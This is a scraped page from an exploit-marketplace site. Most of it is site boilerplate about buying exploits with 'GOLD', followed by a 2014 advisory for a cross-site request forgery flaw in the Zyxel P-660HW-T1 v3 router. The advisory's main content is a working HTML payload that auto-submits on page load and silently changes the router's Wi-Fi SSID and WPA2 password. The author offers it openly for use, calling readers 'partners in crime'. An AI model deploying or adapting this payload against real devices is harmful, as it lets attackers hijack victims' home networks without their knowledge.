0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Zyxel P-660HW-T1 v3 Wireless Router - CSRF Vulnerability
# Exploit Title: Zyxel P-660HW-T1 v3 Wireless Router - CSRF Vulnerabilities # Date: 05/22/2014 # Author: Mustafa ALTINKAYNAK # Vendor Homepage:http://www.zyxel.com/tr/tr/products_services/p_660hw_series.shtml?t=p # Category: Hardware/Wireless Router # Tested on: Zyxel P-660HW-T1 v3 Wireless Router # Patch/ Fix: Vendor has not provided any fix for this yet --------------------------- Technical Details --------------------------- This vulnerability was tested at the P-660HW-T1 devices. Admin panel is open you can run remote code destination. You can send the form below to prepare the target. Please offending. Being partners in crime. Disclosure Timeline --------------------------- 05/21/2014 Contacted Vendor 05/22/2014 Vendor Replied 04/22/2014 Vulnerability Explained (No reply received) 05/23/2014 Full Disclosure Exploit Code --------------------------- Change Wifi (WPA2/PSK) password & SSID by CSRF --------------------------------------------------------------------------------- <html> <body onload="document.form.submit();"> <form action="http://192.168.1.1/Forms/WLAN_General_1" method="POST" name="form"> <input type="hidden" name="EnableWLAN" value="on"> <input type="hidden" name="Channel_ID" value="00000005"> <input type="hidden" name="ESSID" value="WIFI NAME"> <input type="hidden" name="Security_Sel" value="00000002"> <input type="hidden" name="SecurityFlag" value="0"> <input type="hidden" name="WLANCfgPSK" value="123456"> <input type="hidden" name="WLANCfgWPATimer" value="1800"> <input type="hidden" name="QoS_Sel" value="00000000"> <input type="hidden" name="sysSubmit" value="Uygula"> </form> </body> </html> ----------- Mustafa ALTINKAYNAK twitter : @m_altinkaynak <https://twitter.com/m_altinkaynak> www.mustafaaltinkaynak.com # 0day.today [2024-12-26] #